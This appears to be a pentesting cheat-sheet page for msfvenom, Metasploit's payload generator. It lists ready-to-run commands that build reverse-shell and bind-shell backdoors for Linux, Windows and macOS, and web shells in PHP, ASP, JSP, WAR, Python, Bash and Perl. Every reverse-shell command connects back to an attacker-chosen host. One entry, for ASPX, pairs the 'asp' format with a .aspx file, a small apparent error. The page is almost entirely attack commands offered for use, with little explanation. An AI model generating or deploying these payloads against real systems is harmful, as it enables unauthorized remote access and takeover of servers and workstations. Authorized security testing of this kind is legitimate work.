Skip to main content

msfvenom

msfvenom is a payload generator and encoder for Metasploit. It allows you to create shellcode and backdoors for various platforms and formats.

Listing Payloads and Formats

  • List all payloads: 
    msfvenom -l payload
  • List all output formats: 
    msfvenom -l formats

Generating Shellcode & Payloads

Linux

  • 32-bit: 
    msfvenom -p linux/x86/shell/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > shell.elf
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f elf > shell.elf
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > shell.elf
  • 64-bit: 
    msfvenom -p linux/x64/shell/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > shell.elf
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f elf > shell.elf
    msfvenom -p generic/shell_bind_tcp RHOST=$rhost LPORT=$lport -f elf > term.elf

Windows

  • 32-bit: 
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
    msfvenom -p windows/meterpreter_reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
    msfvenom -p windows/powershell_reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
    msfvenom -p windows/shell/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
    msfvenom -p windows/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
  • 64-bit: 
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
    msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
    msfvenom -p windows/x64/shell/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f exe > shell.exe

MacOS

msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > shell.macho
msfvenom -p osx/x86/shell_bind_tcp RHOST=$rhost LPORT=$lport -f macho > bind.macho

Web Payloads

  • PHP: 
    msfvenom -p php/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw > shell.php
    msfvenom -p php/meterpreter_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > shell.php
  • ASP: 
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f asp > shell.asp
  • ASPX: 
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f asp > shell.aspx
  • JSP: 
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > shell.jsp
  • WAR: 
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war > shell.war
  • Python: 
    msfvenom -p python/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > shell.py
    msfvenom -p python/meterpreter_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > shell.py
    msfvenom -p cmd/unix/reverse_python LHOST=$lhost LPORT=$lport -f raw > shell.py
  • Bash: 
    msfvenom -p cmd/unix/reverse_bash LHOST=$lhost LPORT=$lport -f raw > shell.sh
  • Perl: 
    msfvenom -p cmd/unix/reverse_perl LHOST=$lhost LPORT=$lport -f raw > shell.pl